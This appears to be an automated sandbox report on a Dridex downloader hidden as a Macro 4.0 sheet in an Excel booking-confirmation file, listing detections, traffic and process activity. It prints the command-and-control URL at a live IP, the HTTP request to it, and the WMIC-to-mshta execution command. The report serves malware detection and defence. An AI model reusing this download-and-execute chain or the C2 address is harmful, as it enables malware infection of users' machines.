Windows Analysis Report BookingXConfirm-11401.xlsb

Overview

General Information

Sample Name: BookingXConfirm-11401.xlsb
Analysis ID: 528391
MD5: 6b7bad3cea00c7bc8af7e7d0143c5928
SHA1: 8c8c8bfe0d0f61dec2a2083488ff709555b79f0a
SHA256: 2131544f0cfa54af9bdd61cd990af05f1a4483df67d6e6d76ece14cb9cc550f6
Tags: xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Dridex Downloader
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Suspicious WMI Execution
Internet Provider seen in connection with other malware
IP address seen in connection with other malware
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: BookingXConfirm-11401.xlsb Virustotal: Detection: 38% Perma Link
Source: BookingXConfirm-11401.xlsb Metadefender: Detection: 14% Perma Link
Source: BookingXConfirm-11401.xlsb ReversingLabs: Detection: 40%
Multi AV Scanner detection for domain / URL
Source: http://103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA Virustotal: Detection: 5% Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.117.180.99:8080
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.117.180.99:8080

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034532 ET TROJAN Dridex CnC Request - Spam/Worm Component 192.168.2.22:49167 -> 103.117.180.99:8080
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CTRLS-AS-INCtrlSDatacentersLtdIN CTRLS-AS-INCtrlSDatacentersLtdIN
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.117.180.99 103.117.180.99
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /PJ3ZQWVJPYCYDCA9A6Q2Y6YA HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.117.180.99:8080Connection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.117.180.99:8080
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.15Date: Thu, 25 Nov 2021 07:05:55 GMTContent-Type: text/plain; charset=utf-8Connection: keep-aliveContent-Length: 9Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: unknown TCP traffic detected without corresponding DNS query: 103.117.180.99
Source: unknown TCP traffic detected without corresponding DNS query: 103.117.180.99
Source: unknown TCP traffic detected without corresponding DNS query: 103.117.180.99
Source: unknown TCP traffic detected without corresponding DNS query: 103.117.180.99
Source: unknown TCP traffic detected without corresponding DNS query: 103.117.180.99
Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: sheet1.bin String found in binary or memory: http://103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000006.00000002.662770451.0000000003B40000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000002.00000002.450898663.0000000001C80000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000006.00000002.662770451.0000000003B40000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B01B891.png Jump to behavior
Source: global traffic HTTP traffic detected: GET /PJ3ZQWVJPYCYDCA9A6Q2Y6YA HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.117.180.99:8080Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud:

barindex
Yara detected Dridex Downloader
Source: Yara match File source: C:\ProgramData\BnnsIhc.rtf, type: DROPPED

System Summary:

barindex
Found malicious Excel 4.0 Macro
Source: BookingXConfirm-11401.xlsb Macro extractor: Sheet: Macro1 contains: URLDownloadToFileA
Found Excel 4.0 Macro with suspicious formulas
Source: BookingXConfirm-11401.xlsb Initial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheet
Source: BookingXConfirm-11401.xlsb Initial sample: Sheet name: Macro1
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000002.00000002.450787348.0000000000290000.00000004.00000020.sdmp Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' C:\Windows\System32\Wbem\wmic.exeWinSta0\DefaultSg
Found a hidden Excel 4.0 Macro sheet
Source: BookingXConfirm-11401.xlsb Macro extractor: Sheet name: Macro1
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: BookingXConfirm-11401.xlsb Virustotal: Detection: 38%
Source: BookingXConfirm-11401.xlsb Metadefender: Detection: 14%
Source: BookingXConfirm-11401.xlsb ReversingLabs: Detection: 40%
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf'
Source: unknown Process created: C:\Windows\System32\mshta.exe mshta C:\\ProgramData\BnnsIhc.rtf
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$BookingXConfirm-11401.xlsb Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCF3F.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSB@4/4@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: BookingXConfirm-11401.xlsb Initial sample: OLE zip file path = xl/media/image2.png
Source: BookingXConfirm-11401.xlsb Initial sample: OLE zip file path = xl/media/image1.png
Source: BookingXConfirm-11401.xlsb Initial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

barindex
Creates and opens a fake document (probably a fake document to hide exploiting)
Source: unknown Process created: cmd line: bnnsihc.rtf
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: cmd line: bnnsihc.rtf Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2036 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2064 Thread sleep time: -60000s >= -30000s Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Source: mshta.exe, 00000006.00000002.661999246.0000000001120000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000006.00000002.661999246.0000000001120000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: mshta.exe, 00000006.00000002.661999246.0000000001120000.00000002.00020000.sdmp Binary or memory string: Program Manager<
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs